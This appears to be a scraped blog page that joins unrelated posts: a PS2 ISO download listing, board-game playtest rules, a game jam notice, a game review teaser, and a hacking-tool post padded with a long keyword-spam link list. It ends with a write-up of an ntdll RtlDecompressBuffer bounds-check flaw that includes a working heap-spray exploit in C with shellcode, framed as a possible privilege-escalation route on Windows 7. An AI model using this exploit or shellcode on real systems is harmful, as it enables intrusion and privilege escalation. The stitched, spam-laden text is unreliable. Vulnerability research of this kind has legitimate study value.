Tuesday, September 22, 2020

Urban Reign PS2 ISO For PCSX2

 




System Requirements

Operating System: Windows XP, Vista, Windows 7,8
Processor: Core 2 Duo 2.4 GHz
Ram: 2 GB
Graphics Card: 512 MB



Saturday, September 12, 2020

All For One Revisited -- Again

It's now been about 17 years since David Brain first sent me a prototype copy of All For One, can you believe it?

The last time I had played the game was maybe back in 2012 at a protospiel event. I might have played it one more time since then, but to be honest, I don't remember if I did.

Well, I decided to bring it back to life at my last weekly playtesting session of 2019, and since I didn't remember what changes I was considering, we played it as-written (circa 2012). Then we discussed the game, and I brought it back out today, and played 2 more games, with some significant changes. Good news: I think the changes were for the better!

Since it's been so long, I'll run down the basic rules as I'd write them as of right now:

Setup:
As before, place the plot tokens and character figures in their home spaces on the board. 
Shuffle mission cards and deal 4 to each player. 
Give each player a reference mat and 1 One For All card. 
Deal each player a secret goal card (using only the ones for the appropriate player count).
Set a pile of VP tokens in a supply
NO GUARDS AT ALL

Game play:
On your turn, you have an Action phase and a Draw phase. 

Action phase:
During the Action phase you can do any number of actions from the following list, in any order (most are limited to 1x/turn):
a1) Move (1x/turn): Choose any 1 character and move them up to 3 steps. You may double back, but you must stop the move action upon encountering another character. If carrying a Horse, may choose to have the character ride instead, moving exactly 4 steps, jumping over tokens and figures.
a2) Pick up tokens: While moving, you may have the moving character pick up any number of tokens in the spaces you visit by discarding 1 card for each. Note that when riding, you may not pick up the tokens you jump over. Characters have no capacity limit. (you may pick up the a token in the location of another character you encountered - wording above might make it sound like you can't since I said the move action ends)
ONCE PICKED UP, TOKENS ARE NEVER DROPPED. In order to move them to another character, a Demand action is required (see below)

b) Demand a plot token (1x/turn): If 2 characters are in the same location, you may have one of them demand a plot token held by the other. In this case, a duel ensues to determine the outcome. Note: You do not have to use the same character that you moved - more than 1 character can act on your turn.

c) Complete a mission (1x/turn): Choose a character. If the conditions of a mission card in your hand are met, you may complete the mission with that character (some missions require a specific character to do them). Receive points based on the type of mission and the tokens you deliver (see below), and then bump 1 of that character's favored story tracks per token delivered (max 1 bump per track per mission). ONCE A TRACK HAS MAXED OUT, IT'S COMPLEMENT TRACK IS ALSO LOCKED IN AND NO LONGER MOVES.
c1) Duel missions: 3vp (and draw 1 card)
c2) Character delivery (either/or): 4vp for 1 token, 6vp for both
c3) Any Character mission (2 req'd): 5vp
c4) Standard delivery (req'd/bonus/bonus): 4/6/8vp for 1/2/3 tokens

d. Play One For All card for some effect:
d1) Play when completing a mission to gain an additional 2 VP
d2) Play when picking up tokens to cover the discard cost of all pickups this turn (so max 3 tokens, since you can move up to 3 steps)
d3) Play during a duel for 3 offensive moves (or during another player's turn for 0 offensive moves, but you get it back immediately)
d4) Play during the draw phase of the turn to draw 2 additional cards
d5) Play to immediately end your turn (skipping the draw phase) and start another. This allows for a 2nd move action, a 2nd demand action, or a 2nd mission.

Draw phase:
Draw 2 mission cards from the deck.
You may play One For All to draw 2 additional cards.
Then reclaim your One For All card.
Max hand size = 8 cards (including One For All). If you have more than 8 cards, discard mission cards until you have only 8

Game ends when all 3 story tracks are maxed out

Duels:
Duels between characters are triggered by Demand actions and by Duel missions. In any case, when you trigger a duel on your turn with a character (the one making the demand, or one of the two in the duel mission), you choose one of that character's story tracks to fight for. Announce the chosen character, the nominated track, and if applicable the token being demanded (and maybe from whom, to help other players out).

All players must play 1 card simultaneously, then reveal. Blue cards are worth 1 offense (2 if it's that character's signature move), red cards are worth 1 defense, white cards (riposte) are worth 2 defense. Add up all offense and all defense. If there is more offense than defense, the the duel has been WON. If there is more defense than offense, the duel is LOST. If there is the same amount of offense and defense, then the duel is TIED.
If WON: NOMINATED track is bumped. Token IS moved in the case of a demand.
If LOST:  OPPOSITE track is bumped. Token IS NOT moved in the case of a demand.
If TIED: NO track is bumped. Token IS moved in the case of a demand.

One For All card played by active player is worth 3 offense.
One For All card played by any other player is worth 0 offense, and they get it back immediately.

Abilities and Signature Moves: as before. Aramis' ability to avoid guards must change (since there are no guards now): You may discard a card to move beyond another character. If that proves too useless, maybe it doesn't need to cost a card.

--- End Rules ---

So the big differences from before are:
1. No guards at all
2. 8 card hand
3. Draw 2 cards per turn instead of 1
4. Pay cards to pick up tokens (making that more intentional)
5. No such thing as dropping tokens or hand-offs, it's all just demand actions
6. No "active character" for the turn - you can act with different characters in a turn (move Aramis, demand with Athos, complete a mission with MiLady)

And to clean up some exceptions:
7. Make all Meeting missions into Duels (so they're all the same)
8. Allow riding a horse over dashed lines (ferry crossing and catacombs)

Both 4p games we played today took about 60 minutes, and this mix of rules seemed to work really well.

I added a few connections on the map, and I think a few more might be in order. Might want to sort of revisit the whole map and also the mission cards to make sure that (a) named locations are sort of evenly spaced out (ideally not less than 4 steps between any 2 named locations), and (b) based on token starting locations, no missions are doable on the first turn (at least not without using the One For All card for extra actions)

Due to the higher hand size and extra card draws, the deck almost ran out in our 4p games, and I suspect for 5 players it would definitely run out, so more missions are needed. I'd begin by making more missions with Horses as required or bonus tokens.

I think this is a big improvement over the previous version with respect to fiddliness and rules overhead. It feels good to see some progress on this game -- the biggest disappointment of my game design career is that nothing has ever come of this game.

Global Game Jam 2018 @ KSU 48 HOURS Jam!

IMPORTANT UPDATE:  GGJ @ KSU will be OPEN for the ENTIRE 48 hours.

The Global Game Jam 2018 @ KSU will be held from Friday, January 26th through Sunday, January 28th. 

This is a great opportunity to come and make a game over a weekend. Anyone can join in regardless of skill or experience. Come and have fun, learn, and meet some new people.

Come to the J/Atrium building (Marietta campus). Driving directions and a campus map is available at http://www.kennesaw.edu/maps/docs/marietta_printable_campus_map.pdf and http://www.kennesaw.edu/directionsparking.php 

Register now and save, registration fee increases to $45 on January 19th
https://epay.kennesaw.edu/C20923_ustores/web/classic/product_detail.jsp?PRODUCTID=2015

You will also need to register https://globalgamejam.org/2018/jam-sites/kennesaw-state-university

The registration desk will be on Level 2 of J-Block at 1:00 pm. 

The opening ceremonies will take place in Q-202 and will start at 4:30 pm. The jam will take place in J-Block and will start at 6:00 pm on Friday January 26, 2019.

This is an 18 Plus event. If you are not 18 or older, you will not be able to participate. 


Friday, September 4, 2020

THE ABYSS: INCIDENT AT EUROPA


Out of all of James Camerons' back catalogue of blockbusters, I've always felt The Abyss to be a bit underappreciated. Sure, the visual effects were a milestone in moviemaking but underneath all of that is a thought-provoking sci-fi that's as deep as the depths the story takes you. In 1998, a year shy of its 10th anniversary, a little known developer by the name of Sound Source Interactive took that ageing I.P. and created a somewhat forgotten first-person action-adventure.

Read more »

Monday, August 31, 2020

Zirikatu Tool - Fud Payload Generator Script

Read more


  1. Pentest Tools Website Vulnerability
  2. What Are Hacking Tools
  3. New Hacker Tools
  4. Pentest Tools Website Vulnerability
  5. Hacking Tools For Windows
  6. How To Install Pentest Tools In Ubuntu
  7. Game Hacking
  8. Hacks And Tools
  9. Computer Hacker
  10. Hacking Tools
  11. How To Hack
  12. Hacker Tools Mac
  13. Hacking Tools Online
  14. Hack Rom Tools
  15. Pentest Tools Online
  16. Hacker Tools Hardware
  17. Hack Tools For Ubuntu
  18. Hack Tools
  19. Hacker Tools For Pc
  20. Termux Hacking Tools 2019
  21. Hacking Tools For Beginners
  22. Hack Tools For Mac
  23. Pentest Tools Website Vulnerability
  24. What Is Hacking Tools
  25. Pentest Recon Tools
  26. Hacking Tools 2019
  27. Wifi Hacker Tools For Windows
  28. New Hack Tools
  29. Hacking Tools
  30. How To Make Hacking Tools
  31. Hack Tools Download
  32. Best Hacking Tools 2019
  33. Blackhat Hacker Tools
  34. Hacker Tools For Windows
  35. Hacker Tools For Mac
  36. Hack Tools For Games
  37. Hacker Tools
  38. Hacker Tools Free Download
  39. Pentest Reporting Tools
  40. Pentest Tools Alternative
  41. Hack Tools Online
  42. Hacker Techniques Tools And Incident Handling
  43. Hacking Tools Mac
  44. Pentest Tools Bluekeep
  45. Bluetooth Hacking Tools Kali
  46. Hacking Tools For Mac
  47. Hacking Tools Kit
  48. Hacker Tools Hardware
  49. Nsa Hack Tools Download
  50. Hack Website Online Tool
  51. Hack Tools For Windows
  52. Pentest Box Tools Download
  53. Hacker Tools List
  54. Hack Rom Tools
  55. Hacker Tools Apk
  56. Hacking Tools Hardware
  57. Pentest Tools For Android
  58. Pentest Tools Github
  59. Pentest Tools Github
  60. Hack Tools Pc
  61. Hacker Tools
  62. Termux Hacking Tools 2019
  63. Hacking Tools Software
  64. Growth Hacker Tools
  65. Hacker Techniques Tools And Incident Handling
  66. Hacker Tool Kit
  67. Pentest Tools Android
  68. Pentest Tools Kali Linux
  69. Hacker Tools
  70. Hacking Tools For Windows 7
  71. World No 1 Hacker Software
  72. Hacking Apps
  73. Top Pentest Tools
  74. Hacks And Tools
  75. Pentest Tools Bluekeep
  76. Hacker Tools Free Download
  77. Tools Used For Hacking
  78. Hacking Apps
  79. Hacker Tools 2019
  80. Hack App
  81. Hacking Tools Name
  82. Hack Tools 2019
  83. Pentest Reporting Tools
  84. Pentest Tools Online
  85. Pentest Tools List
  86. Hack Tools For Pc
  87. Tools Used For Hacking
  88. Hacker Techniques Tools And Incident Handling
  89. Black Hat Hacker Tools
  90. Hacking Tools Github
  91. New Hacker Tools
  92. Pentest Tools Website
  93. Hacker Tools Windows
  94. How To Install Pentest Tools In Ubuntu
  95. Pentest Tools For Android
  96. How To Make Hacking Tools
  97. Wifi Hacker Tools For Windows
  98. Hacker
  99. Pentest Tools For Android
  100. Pentest Tools Nmap
  101. Hacking Tools 2019
  102. Hack Tools For Pc
  103. Hack App
  104. Best Hacking Tools 2019
  105. Hack Tools For Windows
  106. Nsa Hack Tools Download
  107. Pentest Tools For Windows
  108. Tools Used For Hacking
  109. Hacking Tools
  110. Pentest Tools Url Fuzzer
  111. New Hack Tools
  112. Pentest Tools Kali Linux
  113. Hacker Tools Github
  114. Hack Tools Online
  115. Hacker Tools Apk Download
  116. Hack Tools Download
  117. Best Hacking Tools 2019
  118. What Are Hacking Tools
  119. Hacker Search Tools

Sunday, August 30, 2020

WHAT IS ETHICAL HACKING

What is ethical hacking?

Ethical hacking is identifying weakness in computer system and/or computer networks and coming with countermeasures that protect the weakness.

Ethical hackers must abide by the following rules-
1-Get written permission from the owner of the computer system and/or computer network before  hacking.
2-Protect the privacy of the organisation been hacked etc.

Ethical Hacking and Ethical Hacker are terms used to describe hacking performed by a company or individual to help identity potential threats on a computer or network.
 

An Ethical Hacker attempts to byepass system security and search for any weak point that could be exploited by Malicious Hackers.

Related word


RtlDecompresBuffer Vulnerability

Introduction

The RtlDecompressBuffer is a WinAPI implemented on ntdll that is often used by browsers and applications and also by malware to decompress buffers compressed on LZ algorithms for example LZNT1.

The first parameter of this function is a number that represents the algorithm to use in the decompression, for example the 2 is the LZNT1. This algorithm switch is implemented as a callback table with the pointers to the algorithms, so the boundaries of this table must be controlled for avoiding situations where the execution flow is redirected to unexpected places, specially controlled heap maps.

The algorithms callback table







Notice the five nops at the end probably for adding new algorithms in the future.

The way to jump to this pointers depending on the algorithm number is:
call RtlDecompressBufferProcs[eax*4]

The bounrady checks

We control eax because is the algorithm number, but the value of eax is limited, let's see the boudary checks:


int  RtlDecompressBuffer(unsigned __int8 algorithm, int a2, int a3, int a4, int a5, int a6)
{
int result; // eax@4

if ( algorithm & algorithm != 1 )
{
if ( algorithm & 0xF0 )
result = -1073741217;
else
result = ((int (__stdcall *)(int, int, int, int, int))RtlDecompressBufferProcs[algorithm])(a2, a3, a4, a5, a6);
}
else
{
result = -1073741811;
}
return result;
}

Regarding that decompilation seems that we can only select algorithm number from 2 to 15, regarding that  the algorithm 9 is allowed and will jump to 0x90909090, but we can't control that addess.



let's check the disassembly on Win7 32bits:

  • the movzx limits the boundaries to 16bits
  • the test ax, ax avoids the algorithm 0
  • the cmp ax, 1 avoids the algorithm 1
  • the test al, 0F0h limits the boundary .. wait .. al?


Let's calc the max two bytes number that bypass the test al, F0h

unsigned int max(void) {
        __asm__("xorl %eax, %eax");
        __asm__("movb $0xff, %ah");
        __asm__("movb $0xf0, %al");
}

int main(void) {
        printf("max: %u\n", max());
}

The value is 65520, but the fact is that is simpler than that, what happens if we put the algorithm number 9? 



So if we control the algorithm number we can redirect the execution flow to 0x55ff8890 which can be mapped via spraying.

Proof of concept

This exploit code, tells to the RtlDecompresBuffer to redirect the execution flow to the address 0x55ff8890 where is a map with the shellcode. To reach this address the heap is sprayed creating one Mb chunks to reach this address.

The result on WinXP:

The result on Win7 32bits:


And the exploit code:

/*
ntdll!RtlDecompressBuffer() vtable exploit + heap spray
by @sha0coder

*/

#include
#include
#include

#define KB 1024
#define MB 1024*KB
#define BLK_SZ 4096
#define ALLOC 200
#define MAGIC_DECOMPRESSION_AGORITHM 9

// WinXP Calc shellcode from http://shell-storm.org/shellcode/files/shellcode-567.php
/*
unsigned char shellcode[] = "\xeB\x02\xBA\xC7\x93"
"\xBF\x77\xFF\xD2\xCC"
"\xE8\xF3\xFF\xFF\xFF"
"\x63\x61\x6C\x63";
*/

// https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html
char *shellcode =
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
"\x57\x78\x01\xc2\x8b\x7a\x20\x01"
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
"\x45\x81\x3e\x43\x72\x65\x61\x75"
"\xf2\x81\x7e\x08\x6f\x63\x65\x73"
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
"\xb1\xff\x53\xe2\xfd\x68\x63\x61"
"\x6c\x63\x89\xe2\x52\x52\x53\x53"
"\x53\x53\x53\x53\x52\x53\xff\xd7";


PUCHAR landing_ptr = (PUCHAR)0x55ff8b90; // valid for Win7 and WinXP 32bits

void fail(const char *msg) {
printf("%s\n\n", msg);
exit(1);
}

PUCHAR spray(HANDLE heap) {
PUCHAR map = 0;

printf("Spraying ...\n");
printf("Aproximating to %p\n", landing_ptr);

while (map < landing_ptr-1*MB) {
map = HeapAlloc(heap, 0, 1*MB);
}

//map = HeapAlloc(heap, 0, 1*MB);

printf("Aproximated to [%x - %x]\n", map, map+1*MB);


printf("Landing adddr: %x\n", landing_ptr);
printf("Offset of landing adddr: %d\n", landing_ptr-map);

return map;
}

void landing_sigtrap(int num_of_traps) {
memset(landing_ptr, 0xcc, num_of_traps);
}

void copy_shellcode(void) {
memcpy(landing_ptr, shellcode, strlen(shellcode));

}

int main(int argc, char **argv) {
FARPROC RtlDecompressBuffer;
NTSTATUS ntStat;
HANDLE heap;
PUCHAR compressed, uncompressed;
ULONG compressed_sz, uncompressed_sz, estimated_uncompressed_sz;

RtlDecompressBuffer = GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlDecompressBuffer");

heap = GetProcessHeap();

compressed_sz = estimated_uncompressed_sz = 1*KB;

compressed = HeapAlloc(heap, 0, compressed_sz);

uncompressed = HeapAlloc(heap, 0, estimated_uncompressed_sz);


spray(heap);
copy_shellcode();
//landing_sigtrap(1*KB);
printf("Landing ...\n");

ntStat = RtlDecompressBuffer(MAGIC_DECOMPRESSION_AGORITHM, uncompressed, estimated_uncompressed_sz, compressed, compressed_sz, &uncompressed_sz);

switch(ntStat) {
case STATUS_SUCCESS:
printf("decompression Ok!\n");
break;

case STATUS_INVALID_PARAMETER:
printf("bad compression parameter\n");
break;


case STATUS_UNSUPPORTED_COMPRESSION:
printf("unsuported compression\n");
break;

case STATUS_BAD_COMPRESSION_BUFFER:
printf("Need more uncompressed buffer\n");
break;

default:
printf("weird decompression state\n");
break;
}

printf("end.\n");
}

The attack vector
This API is called very often in the windows system, and also is called by browsers, but he attack vector is not common, because the apps that call this API trend to hard-code the algorithm number, so in a normal situation we don't control the algorithm number. But if there is a privileged application service or a driver that let to switch the algorithm number, via ioctl, config, etc. it can be used to elevate privileges on win7
More information